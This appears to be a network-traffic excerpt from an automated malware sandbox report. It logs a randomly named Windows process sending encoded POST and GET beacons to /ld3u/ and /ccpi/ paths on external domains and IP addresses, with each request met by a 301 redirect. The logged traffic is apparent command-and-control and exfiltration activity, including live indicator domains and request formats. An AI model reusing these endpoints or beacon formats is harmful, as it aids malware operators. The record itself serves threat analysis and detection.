                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    21192.168.2.55721234.149.87.45802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:26:17.488027096 CEST720OUTPOST /ld3u/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.smokesandhoney.com
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.smokesandhoney.com
                                                    Referer: http://www.smokesandhoney.com/ld3u/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 32 65 36 53 4f 79 68 68 68 68 74 6d 6f 71 46 6e 6c 2b 69 45 74 45 6f 7a 78 70 71 6c 37 64 5a 68 6a 4c 67 38 30 79 66 78 71 44 6c 74 42 47 30 47 39 76 5a 77 38 4a 31 54 36 71 48 79 41 77 58 57 55 58 43 44 68 6b 70 62 69 32 66 6c 6b 74 38 2b 2b 62 72 53 6d 34 39 79 64 7a 6b 67 71 6f 57 33 31 47 55 6a 54 53 65 6b 52 68 68 5a 30 68 62 71 4d 71 4a 5a 68 50 65 48 43 53 54 70 4f 41 7a 68 4d 55 38 75 51 72 30 2f 6a 52 2b 58 74 49 41 51 36 76 4b 31 70 73 70 54 57 48 54 62 6f 30 48 61 76 31 56 51 54 37 42 58 7a 75 5a 46 79 42 44 33 55 58 4b 76 73 34 67 52 58 70 52 74 62 78 51 63 37 62 68 32 2b 2f 38 3d
                                                    Data Ascii: V6h=2e6SOyhhhhtmoqFnl+iEtEozxpql7dZhjLg80yfxqDltBG0G9vZw8J1T6qHyAwXWUXCDhkpbi2flkt8++brSm49ydzkgqoW31GUjTSekRhhZ0hbqMqJZhPeHCSTpOAzhMU8uQr0/jR+XtIAQ6vK1pspTWHTbo0Hav1VQT7BXzuZFyBD3UXKvs4gRXpRtbxQc7bh2+/8=
                                                    Sep 5, 2024 14:26:17.948947906 CEST394INHTTP/1.1 301 Moved Permanently
                                                    Content-Length: 0
                                                    Location: https://www.smokesandhoney.com/ld3u/
                                                    Accept-Ranges: bytes
                                                    Date: Thu, 05 Sep 2024 12:26:17 GMT
                                                    X-Served-By: cache-iad-kiad7000133-IAD
                                                    X-Cache: MISS
                                                    X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=
                                                    Via: 1.1 google
                                                    glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    22192.168.2.55721334.149.87.45802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:26:20.028033972 CEST740OUTPOST /ld3u/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.smokesandhoney.com
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.smokesandhoney.com
                                                    Referer: http://www.smokesandhoney.com/ld3u/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 32 65 36 53 4f 79 68 68 68 68 74 6d 70 4c 56 6e 32 4e 4b 45 72 6b 6f 77 2f 4a 71 6c 79 39 5a 6c 6a 4c 6b 38 30 7a 72 62 74 78 52 74 42 6e 45 47 76 2b 5a 77 2f 4a 31 54 39 61 48 7a 4f 51 58 4e 55 58 4f 78 68 6b 56 62 69 32 4c 6c 6b 74 73 2b 2b 71 72 54 6e 6f 39 38 45 6a 6b 69 6c 49 57 33 31 47 55 6a 54 57 4f 43 52 67 46 5a 30 52 4c 71 65 49 68 61 39 66 65 41 56 69 54 70 4b 41 7a 6c 4d 55 38 63 51 71 59 52 6a 53 57 58 74 4b 6f 51 35 2b 4b 36 69 73 70 56 4c 58 53 33 74 58 57 33 6d 57 56 6b 52 4c 51 67 73 4d 74 72 2b 58 75 64 4f 31 43 48 2f 59 4d 70 48 36 5a 61 4b 42 78 31 68 34 78 47 67 6f 6f 75 67 36 45 77 32 63 4b 77 58 75 68 45 71 7a 53 6d 50 71 39 6c
                                                    Data Ascii: V6h=2e6SOyhhhhtmpLVn2NKErkow/Jqly9ZljLk80zrbtxRtBnEGv+Zw/J1T9aHzOQXNUXOxhkVbi2Llkts++qrTno98EjkilIW31GUjTWOCRgFZ0RLqeIha9feAViTpKAzlMU8cQqYRjSWXtKoQ5+K6ispVLXS3tXW3mWVkRLQgsMtr+XudO1CH/YMpH6ZaKBx1h4xGgooug6Ew2cKwXuhEqzSmPq9l
                                                    Sep 5, 2024 14:26:20.494457006 CEST394INHTTP/1.1 301 Moved Permanently
                                                    Content-Length: 0
                                                    Location: https://www.smokesandhoney.com/ld3u/
                                                    Accept-Ranges: bytes
                                                    Date: Thu, 05 Sep 2024 12:26:20 GMT
                                                    X-Served-By: cache-iad-kcgs7200119-IAD
                                                    X-Cache: MISS
                                                    X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,AHc3TXLcXOul+t9LIbGg9ciHE4dbw+wewoJ5nvKoyjE=
                                                    Via: 1.1 google
                                                    glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    23192.168.2.55721434.149.87.45802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:26:22.556262970 CEST1757OUTPOST /ld3u/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.smokesandhoney.com
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.smokesandhoney.com
                                                    Referer: http://www.smokesandhoney.com/ld3u/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 32 65 36 53 4f 79 68 68 68 68 74 6d 70 4c 56 6e 32 4e 4b 45 72 6b 6f 77 2f 4a 71 6c 79 39 5a 6c 6a 4c 6b 38 30 7a 72 62 74 78 4a 74 42 52 51 47 39 4a 74 77 2b 4a 31 54 2b 61 48 32 4f 51 57 56 55 58 58 34 68 6b 59 6d 69 7a 50 6c 6c 4f 30 2b 36 6f 50 54 2b 34 39 38 5a 7a 6b 76 71 6f 58 7a 31 47 45 6e 54 53 53 43 52 67 46 5a 30 58 48 71 49 71 4a 61 74 76 65 48 43 53 54 62 4f 41 7a 4e 4d 55 6c 70 51 71 73 76 6a 6a 32 58 74 71 59 51 31 73 69 36 2b 38 70 58 49 58 53 76 74 58 61 30 6d 57 49 62 52 4b 55 4b 73 50 39 72 2b 53 65 44 66 6b 4b 7a 71 5a 4e 52 4b 64 59 33 58 6e 6c 55 38 2b 4e 67 6b 36 34 59 6a 65 55 51 78 4b 71 55 5a 64 73 44 32 69 4f 73 4e 76 78 70 4f 4c 6f 52 77 30 4e 38 72 44 6e 41 36 35 4c 35 76 4f 6b 2f 52 54 69 32 7a 78 30 42 4d 2b 54 2b 58 69 54 66 6e 4e 64 53 70 63 70 6d 76 6c 74 31 42 2f 31 71 31 50 5a 39 47 42 61 43 46 30 64 37 46 59 78 42 65 75 76 42 6b 44 48 78 6c 53 31 56 38 63 5a 53 72 51 77 68 31 78 39 72 74 75 63 74 2b 39 71 64 30 44 6f 66 2b 44 66 51 43 6d 6c 6c 68 66 [TRUNCATED]
                                                    Data Ascii: V6h=2e6SOyhhhhtmpLVn2NKErkow/Jqly9ZljLk80zrbtxJtBRQG9Jtw+J1T+aH2OQWVUXX4hkYmizPllO0+6oPT+498ZzkvqoXz1GEnTSSCRgFZ0XHqIqJatveHCSTbOAzNMUlpQqsvjj2XtqYQ1si6+8pXIXSvtXa0mWIbRKUKsP9r+SeDfkKzqZNRKdY3XnlU8+Ngk64YjeUQxKqUZdsD2iOsNvxpOLoRw0N8rDnA65L5vOk/RTi2zx0BM+T+XiTfnNdSpcpmvlt1B/1q1PZ9GBaCF0d7FYxBeuvBkDHxlS1V8cZSrQwh1x9rtuct+9qd0Dof+DfQCmllhfTLIrCH4V1QfZpexXllUCDJ1CmxkGgkLKdjGHN3jgXDSmEzKrlJjG0qhDUlf/LUfL8HXGbdQrrfif0eBl9t998kVuWl3bF9hUwhFgqlrwVkbIuhXIx3VUlIdj8V47FMCnBrXLHHTnGHYwYKDD75DI4EuAioTQNedCRjgCrRm2RO8Ig8jCvPDq0nie9dHNo8qDlZwbv3CzMHN0eauAzVxKacLc+a93tNQYKOnCsdAFj3hPoGrSmgZ/AGJsCgouqVYAdh57ZJytk/DAxFAx89NmSE5ZSTciy2w8Vi2Od4NNNGV115G/mrOXcO4WSYlEOwEj1zwH/ClqWvbX1hCoenjjJzJ49mchDTb/GYhCpCvb9VzoG4n5iqi5FhijH/lahEX2+OxiQ56Osb0LUPdFaCGjWii2/3RZ+x6llFKz0Y1qQ9zIGpIfDnLswXy/e/HeujdypPAeC6dyyJcFxKqw3aCphg4T+pJy7JkMWshSNw/7Ybm39wFkm2I7yZLWLmOhrhstO076S1bDW3V7zDeTfPRfqAjqKE6LluD0tubgqybfWdM3jU85NcfbCH3suk45TpxiE1JMkKAzp+6FYA8DPTPZHTbHp+RGsAi6HdNN3QAWNvVyPMsomeiwQQhpDxBwU/0djGCqjMF846OQ6YnltFOOt/NwA8B0MM2Vxl [TRUNCATED]
                                                    Sep 5, 2024 14:26:23.015678883 CEST394INHTTP/1.1 301 Moved Permanently
                                                    Content-Length: 0
                                                    Location: https://www.smokesandhoney.com/ld3u/
                                                    Accept-Ranges: bytes
                                                    Date: Thu, 05 Sep 2024 12:26:22 GMT
                                                    X-Served-By: cache-iad-kcgs7200068-IAD
                                                    X-Cache: MISS
                                                    X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,jKB0KR2wTEE1MYSdxvKSbciHE4dbw+wewoJ5nvKoyjE=
                                                    Via: 1.1 google
                                                    glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    24192.168.2.55721534.149.87.45802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:26:25.086555004 CEST453OUTGET /ld3u/?V6h=7cSyNGFy/S5quoM6udyikngV4L2ptvlq1/kf9BPZtTlwCENfjvle2IZfxcv5JQLEZFLmm1935WPn1s0g14qVusJPQGgEr6+5yVxfblixZgca2mD/C/dkht+8dQzCD1+Jew==&sH=nVVHdDTx2PSTVJ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.smokesandhoney.com
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:26:25.546081066 CEST549INHTTP/1.1 301 Moved Permanently
                                                    Content-Length: 0
                                                    Location: https://www.smokesandhoney.com/ld3u/?V6h=7cSyNGFy/S5quoM6udyikngV4L2ptvlq1/kf9BPZtTlwCENfjvle2IZfxcv5JQLEZFLmm1935WPn1s0g14qVusJPQGgEr6+5yVxfblixZgca2mD/C/dkht+8dQzCD1+Jew==&sH=nVVHdDTx2PSTVJ
                                                    Accept-Ranges: bytes
                                                    Date: Thu, 05 Sep 2024 12:26:25 GMT
                                                    X-Served-By: cache-iad-kjyo7100056-IAD
                                                    X-Cache: MISS
                                                    X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,AHc3TXLcXOul+t9LIbGg9ciHE4dbw+wewoJ5nvKoyjE=
                                                    Via: 1.1 google
                                                    glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    25192.168.2.55721691.203.110.247802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:26:30.605568886 CEST711OUTPOST /ccpi/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.wildenmann.shop
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.wildenmann.shop
                                                    Referer: http://www.wildenmann.shop/ccpi/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 77 34 48 39 42 2f 70 56 72 7a 47 69 62 7a 4c 69 70 36 67 79 48 49 2f 67 62 78 57 76 4e 76 78 78 39 49 61 62 68 77 33 4d 71 77 5a 6d 30 69 66 6e 70 70 77 37 44 70 35 4f 79 65 69 6c 31 31 6b 68 4b 64 43 58 39 6c 32 78 65 63 59 4c 69 45 30 51 6f 57 52 2f 79 39 39 58 6c 70 69 50 52 58 41 65 31 75 47 64 72 4b 70 72 31 59 4c 57 74 6f 70 38 72 6a 31 65 76 2f 74 52 4c 4f 31 6f 4a 2b 49 79 65 4c 76 69 52 33 32 46 79 66 64 5a 69 4f 66 51 66 57 79 4c 73 2f 54 55 6f 57 45 42 64 2f 63 67 63 58 4d 59 32 76 65 71 57 38 30 69 79 54 54 33 35 46 4c 4c 51 64 65 70 35 58 37 69 6d 6c 72 68 49 78 6b 53 70 79 30 3d
                                                    Data Ascii: V6h=w4H9B/pVrzGibzLip6gyHI/gbxWvNvxx9Iabhw3MqwZm0ifnppw7Dp5Oyeil11khKdCX9l2xecYLiE0QoWR/y99XlpiPRXAe1uGdrKpr1YLWtop8rj1ev/tRLO1oJ+IyeLviR32FyfdZiOfQfWyLs/TUoWEBd/cgcXMY2veqW80iyTT35FLLQdep5X7imlrhIxkSpy0=
                                                    Sep 5, 2024 14:26:31.226120949 CEST926INHTTP/1.1 301 Moved Permanently
                                                    Connection: close
                                                    content-type: text/html
                                                    content-length: 707
                                                    date: Thu, 05 Sep 2024 12:26:31 GMT
                                                    server: LiteSpeed
                                                    location: http://wildenmann.shop/ccpi/
                                                    x-powered-by: PleskLin
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    26192.168.2.55721791.203.110.247802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:26:33.248716116 CEST731OUTPOST /ccpi/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.wildenmann.shop
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.wildenmann.shop
                                                    Referer: http://www.wildenmann.shop/ccpi/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 77 34 48 39 42 2f 70 56 72 7a 47 69 62 53 62 69 76 64 4d 79 50 49 2f 6e 65 78 57 76 44 50 78 31 39 49 57 62 68 7a 36 52 74 43 4e 6d 78 33 6a 6e 71 71 6f 37 4b 35 35 4f 36 2b 69 6b 37 56 6b 51 4b 64 48 30 39 67 4f 78 65 63 4d 4c 69 46 45 51 6f 68 4e 77 7a 74 39 5a 74 4a 69 33 56 58 41 65 31 75 47 64 72 4b 74 52 31 59 54 57 74 34 5a 38 71 43 31 42 6c 66 74 53 63 2b 31 6f 66 2b 49 32 65 4c 76 41 52 32 72 53 79 61 52 5a 69 4c 6a 51 63 43 65 45 6a 2f 54 53 6c 32 46 54 4d 38 74 35 46 58 6c 51 72 66 66 6f 56 74 55 74 2b 46 2b 64 6a 6e 44 6a 44 39 79 52 70 45 7a 56 33 56 4b 49 53 53 30 69 33 6c 6a 66 72 66 74 5a 58 73 6e 54 2f 65 4b 6f 43 38 35 65 6b 61 55 6b
                                                    Data Ascii: V6h=w4H9B/pVrzGibSbivdMyPI/nexWvDPx19IWbhz6RtCNmx3jnqqo7K55O6+ik7VkQKdH09gOxecMLiFEQohNwzt9ZtJi3VXAe1uGdrKtR1YTWt4Z8qC1BlftSc+1of+I2eLvAR2rSyaRZiLjQcCeEj/TSl2FTM8t5FXlQrffoVtUt+F+djnDjD9yRpEzV3VKISS0i3ljfrftZXsnT/eKoC85ekaUk
                                                    Sep 5, 2024 14:26:33.887597084 CEST926INHTTP/1.1 301 Moved Permanently
                                                    Connection: close
                                                    content-type: text/html
                                                    content-length: 707
                                                    date: Thu, 05 Sep 2024 12:26:33 GMT
                                                    server: LiteSpeed
                                                    location: http://wildenmann.shop/ccpi/
                                                    x-powered-by: PleskLin
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    27192.168.2.55721891.203.110.247802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:26:35.796065092 CEST1748OUTPOST /ccpi/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.wildenmann.shop
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.wildenmann.shop
                                                    Referer: http://www.wildenmann.shop/ccpi/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 77 34 48 39 42 2f 70 56 72 7a 47 69 62 53 62 69 76 64 4d 79 50 49 2f 6e 65 78 57 76 44 50 78 31 39 49 57 62 68 7a 36 52 74 43 56 6d 78 6c 62 6e 74 37 6f 37 51 35 35 4f 35 2b 69 68 37 56 6b 33 4b 5a 72 6f 39 67 53 68 65 65 30 4c 6a 6a 51 51 2f 46 35 77 36 74 39 5a 68 70 69 4d 52 58 41 4c 31 75 57 5a 72 4a 46 52 31 59 54 57 74 2b 31 38 71 54 31 42 6a 66 74 52 4c 4f 31 30 4a 2b 49 4f 65 4c 6e 36 52 32 2f 43 7a 75 74 5a 69 76 2f 51 50 42 6d 45 38 50 54 71 6b 32 45 57 4d 38 68 63 46 52 41 70 72 63 44 57 56 71 67 74 37 79 79 4c 36 6d 4f 2f 5a 4d 6d 51 76 58 48 33 6e 53 32 36 63 30 78 53 71 55 54 65 76 2f 6c 30 65 49 6e 52 35 50 6e 79 5a 4b 6c 4e 6a 50 78 57 2f 6d 58 47 4e 73 6d 68 53 59 2b 4c 65 34 78 67 41 6c 72 2f 69 77 61 57 76 4e 36 62 46 75 34 41 75 68 46 34 54 4a 54 76 7a 63 68 41 51 35 73 65 38 4f 65 50 50 42 4e 76 55 72 47 6e 30 50 6a 72 41 48 43 6f 77 4e 46 4f 67 45 61 74 4c 6a 39 4a 4b 53 62 34 42 44 39 70 75 4a 41 2b 6f 42 62 34 65 65 54 42 64 38 4f 48 58 4f 6a 73 75 70 63 6c 4a 6b [TRUNCATED]
                                                    Data Ascii: V6h=w4H9B/pVrzGibSbivdMyPI/nexWvDPx19IWbhz6RtCVmxlbnt7o7Q55O5+ih7Vk3KZro9gShee0LjjQQ/F5w6t9ZhpiMRXAL1uWZrJFR1YTWt+18qT1BjftRLO10J+IOeLn6R2/CzutZiv/QPBmE8PTqk2EWM8hcFRAprcDWVqgt7yyL6mO/ZMmQvXH3nS26c0xSqUTev/l0eInR5PnyZKlNjPxW/mXGNsmhSY+Le4xgAlr/iwaWvN6bFu4AuhF4TJTvzchAQ5se8OePPBNvUrGn0PjrAHCowNFOgEatLj9JKSb4BD9puJA+oBb4eeTBd8OHXOjsupclJkP4I6lRO4HkixdhwuGn0nBypB+qbLVOe1aS0O0Q592K8U0/l9ti14ocQoo1InZtXcgW/7aqI3oulRk9RUGjMeLRpp8XbVxbO7J2ZvDA370kG9HQGjVKQQCYGumwXbgNDfa9sdZ9+ICDQSAXdRAP9tBmJx/MPd/9sjgk+ld1Vemhs8ybuPu0xRNCNfunp+QfDPOE8/pXADiUXFZ5RLo2jz2BUj7nMDjYDWr31nyyiNER++uCoW27xS/X+q4xq+r/VnYYWQvnD56aISPbNpG6KVoJqDm2eLFALdTrxslvTlcFehii60P8/9ZrDJePqiCqOpsG78Kpo9FTOvsNCZeuWzbjvEvJ7IvyHeNXPYRPDIzeoGnfNhfW+GnLHZZkmrE8eZTQstusHX/pr/kePJTlJPIkB6hRhufN3YXx3zEI48ep3etqDZU7DJd40LhUJ2fKGRUuQQvwWkjZBx20S29Syxk7Db4mZE/zU84nwhrJP3P3mL1mmnUwQbkl6ashu9yRRnsPmVGN4olT9ju7Fy8yPxzGH3o+dhaIylEm6BHmzCOawN38/TQbNW22YVrrerx5YfwCz7VwStUHRBBuc2qEPFYtjIcpx6NgCFVK49T3M/LSHhdfx+qoA90Y00qkq9asfVPU9X73dZ/SyyZKW0UC4XRKPNJ+x8z/ltWT [TRUNCATED]
                                                    Sep 5, 2024 14:26:36.447278976 CEST926INHTTP/1.1 301 Moved Permanently
                                                    Connection: close
                                                    content-type: text/html
                                                    content-length: 707
                                                    date: Thu, 05 Sep 2024 12:26:36 GMT
                                                    server: LiteSpeed
                                                    location: http://wildenmann.shop/ccpi/
                                                    x-powered-by: PleskLin
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
